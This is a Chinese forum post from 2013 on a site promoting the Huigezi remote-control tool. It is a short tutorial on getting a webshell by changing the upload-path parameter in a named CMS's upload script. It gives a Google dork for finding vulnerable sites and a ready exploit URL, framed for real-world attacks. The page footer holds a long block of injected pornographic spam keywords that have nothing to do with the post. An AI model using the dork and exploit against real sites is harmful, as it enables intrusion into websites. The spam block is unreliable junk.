灰鴿子遠(yuǎn)程控制軟件

 找回密碼
 立即注冊(cè)

QQ登錄

只需一步,快速開(kāi)始

查看: 16201|回復(fù): 0
打印 上一主題 下一主題

修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載www.dumiaotech.com

[復(fù)制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
發(fā)表于 2013-2-3 14:12:16 | 只看該作者 回帖獎(jiǎng)勵(lì) |倒序?yàn)g覽 |閱讀模式
修改url的參數(shù)進(jìn)行突破上傳限制拿webshell 灰鴿子下載


大家可能都看見(jiàn)過(guò)這樣的漏洞,這里以瘋子的嘉友科技cms上傳漏洞為例。

谷歌關(guān)鍵字:inurl:newslist.asp?NodeCode=   灰鴿子使用教程灰鴿子下載exp:
admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上傳目錄是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出對(duì)參數(shù)PicPath進(jìn)行了修改,
這種漏洞主要是存在文件名或者路徑過(guò)濾不嚴(yán),在實(shí)戰(zhàn)中多多觀察url中的參數(shù),可以嘗試進(jìn)行修改數(shù)據(jù)。

評(píng)帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
回復(fù)

使用道具 舉報(bào)

本版積分規(guī)則

Archiver|手機(jī)版|小黑屋|灰鴿子遠(yuǎn)程控制軟件|灰鴿子遠(yuǎn)程控制軟件 ( 魯ICP備14000061號(hào)-4 )

GMT+8, 2025-3-13 13:55 , Processed in 0.066817 second(s), 22 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復(fù) 返回頂部 返回列表
主站蜘蛛池模板: 一本加勒比hezyo无码专区| 亚洲国产超清无码专区| 精品久久久久久无码人妻| 无码中文字幕一区二区三区| 无码中文字幕av免费放| 亚洲中文字幕久久精品无码APP | 国模无码一区二区三区| 中文字幕无码视频专区| 亚洲日韩国产AV无码无码精品| 日本精品无码一区二区三区久久久| 成人免费无码大片A毛片抽搐| 久久久无码精品国产一区| 特级无码毛片免费视频| 精品欧洲av无码一区二区| 中文无码制服丝袜人妻av| 国产精品va无码二区| 中文无码热在线视频| 亚洲Aⅴ无码专区在线观看q| 亚洲无码日韩精品第一页| 曰韩人妻无码一区二区三区综合部| 丝袜无码一区二区三区| 中文字幕无码不卡在线| 日日日日做夜夜夜夜无码| 国产日韩AV免费无码一区二区三区| 亚洲成a人无码亚洲成www牛牛 | 亚洲大尺度无码专区尤物| 国产精品va无码免费麻豆| 日韩av无码国产精品| 中日韩亚洲人成无码网站| 日韩精品无码一区二区三区免费| 中文有码vs无码人妻| 亚洲精品无码久久久影院相关影片| 国产成人无码精品久久久免费| 亚洲av永久无码| 国产精品无码专区AV在线播放| 内射人妻无码色AV天堂| 无码天堂va亚洲va在线va| 亚洲AⅤ永久无码精品AA| 精品无码国产污污污免费网站国产 | 国产精品JIZZ在线观看无码| 精品无码中出一区二区|